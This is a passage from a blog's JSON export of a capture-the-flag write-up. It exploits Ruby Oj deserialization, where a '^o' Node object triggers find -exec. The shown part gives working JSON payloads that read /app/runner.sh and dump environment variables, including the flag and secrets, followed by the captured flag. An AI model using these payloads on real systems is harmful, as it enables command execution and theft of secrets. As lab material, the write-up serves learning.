style=\"color: #A3BE8C\">Node<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">args<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:[<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">\/app\/runner.sh<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-exec<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">cat<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">{}<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">;<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>Response:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>#!\/bin\/ash\n\nSETUP_CODE=$(printf %s \"${DOJO_OPTS}\" | jq .setup -r)\nINIT=$(\n cat <<'EOF'\nrequire 'json'\n\ndef popenv(name)\n value = ENV[name]\n ENV.delete(name)\n return value\nend\n\nflag = popenv(\"DOJO_FLAG\")\nsecrets = JSON.parse(popenv(\"DOJO_SECRETS\"))\nEOF\n)\n\nCODE=$(\n cat <<EOF\n$INIT\n\n$SETUP_CODE\n\n$DOJO_CODE\nEOF\n)\nprintf %s \"${CODE}\" | ruby\npid 7542 exit 0\n<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #616E88\">#!\/bin\/ash<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">SETUP_CODE<\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #ECEFF4\">$(<\/span><span style=\"color: #88C0D0\">printf<\/span><span style=\"color: #A3BE8C\"> %s <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #81A1C1\">${<\/span><span style=\"color: #D8DEE9\">DOJO_OPTS<\/span><span style=\"color: #81A1C1\">}<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\"> <\/span><span style=\"color: #81A1C1\">|<\/span><span style=\"color: #A3BE8C\"> <\/span><span style=\"color: #88C0D0\">jq<\/span><span style=\"color: #A3BE8C\"> .setup -r<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">INIT<\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #ECEFF4\">$(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\"> <\/span><span style=\"color: #88C0D0\">cat<\/span><span style=\"color: #A3BE8C\"> <\/span><span style=\"color: #81A1C1\"><<<\/span><span style=\"color: #A3BE8C\">'<\/span><span style=\"color: #ECEFF4\">EOF<\/span><span style=\"color: #A3BE8C\">'<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">require 'json'<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">def popenv(name)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\"> value = ENV[name]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\"> ENV.delete(name)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\"> return value<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">end<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">flag = popenv("DOJO_FLAG")<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\">secrets = JSON.parse(popenv("DOJO_SECRETS"))<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">EOF<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">CODE<\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #ECEFF4\">$(<\/span><\/span>\n<span class=\"line\"><span style=\"color: #A3BE8C\"> <\/span><span style=\"color: #88C0D0\">cat<\/span><span style=\"color: #A3BE8C\"> <\/span><span style=\"color: #81A1C1\"><<<\/span><span style=\"color: #ECEFF4\">EOF<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">$INIT<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">$SETUP_CODE<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9\">$DOJO_CODE<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">EOF<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">printf<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">%s<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #81A1C1\">${<\/span><span style=\"color: #D8DEE9\">CODE<\/span><span style=\"color: #81A1C1\">}<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">|<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">ruby<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">pid<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">7542<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">exit<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><\/span>\n<span class=\"line\"><\/span><\/code><\/pre><\/div>\n\n\n\n<p>The contents of <code>runner.sh<\/code> showed the following critical code:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>flag = popenv(\"DOJO_FLAG\")<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">flag<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">popenv<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #88C0D0\">"DOJO_FLAG"<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>This indicated that the flag was stored in an environment variable and not on disk.<\/p>\n\n\n\n<p>Using the ability to execute arbitrary commands via <code>find -exec<\/code>, I executed:<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>{\n \"^o\":\"Node\",\n \"args\":[\"\/\",\"-maxdepth\",\"0\",\"-exec\",\"env\",\";\"]\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">^o<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">Node<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #8FBCBB\">args<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">:[<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">\/<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-maxdepth<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">0<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">-exec<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">env<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #A3BE8C\">;<\/span><span style=\"color: #ECEFF4\">"<\/span><span style=\"color: #ECEFF4\">]<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>This printed the environment variables containing the flag.<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"Copy\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>FLAG=FLAG{Th4t_J0b_D1d_N07_Go_A5_Exp3ct3d}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M4.5 12.75l6 6 9-13.5\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M16.5 8.25V6a2.25 2.25 0 00-2.25-2.25H6A2.25 2.25 0 003.75 6v8.25A2.25 2.25 0 006 16.5h2.25m8.25-8.25H18a2.25 2.25 0 012.25 2.25V18A2.25 2.25 0 0118 20.25h-7.5A2.25 2.25 0 018.25 18v-1.5m8.25-8.25h-6a2.25 2.25 0 00-2.25 2.25v6\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #d8dee9ff\">FLAG=FLAG{Th4t_J0b_D1d_N07_Go_A5_Exp3ct3d}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p><\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"977\" height=\"562\" src=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2026\/02\/Screenshot-2026-04-29-195911.png\" alt=\"\" class=\"wp-image-355\" srcset=\"https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2026\/02\/Screenshot-2026-04-29-195911.png 977w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2026\/02\/Screenshot-2026-04-29-195911-300x173.png 300w, https:\/\/n45ht.or.id\/blog\/wp-content\/uploads\/2026\/02\/Screenshot-2026-04-29-195911-768x442.png 768w\" sizes=\"auto, (max-width: 977px) 100vw, 977px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Initial Ruby Application Code: The application processes user-supplied data by storing it as a job payload and deserializing it using the Ruby Oj library: The deserialized object is then passed into a message handler which conditionally executes a method: The Oj library supports object deserialization when special keys such as ^o are present in JSON input. Because user input is directly […]<\/p>\n","protected":false},"author":5,"featured_media":350,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[32],"class_list":["post-348","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-learning","tag-command-injection"],"_links":{"self":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/348","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/comments?post=348"}],"version-history":[{"count":2,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/348\/revisions"}],"predecessor-version":[{"id":356,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/posts\/348\/revisions\/356"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media\/350"}],"wp:attachment":[{"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/media?parent=348"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/categories?post=348"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/n45ht.or.id\/blog\/wp-json\/wp\/v2\/tags?post=348"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}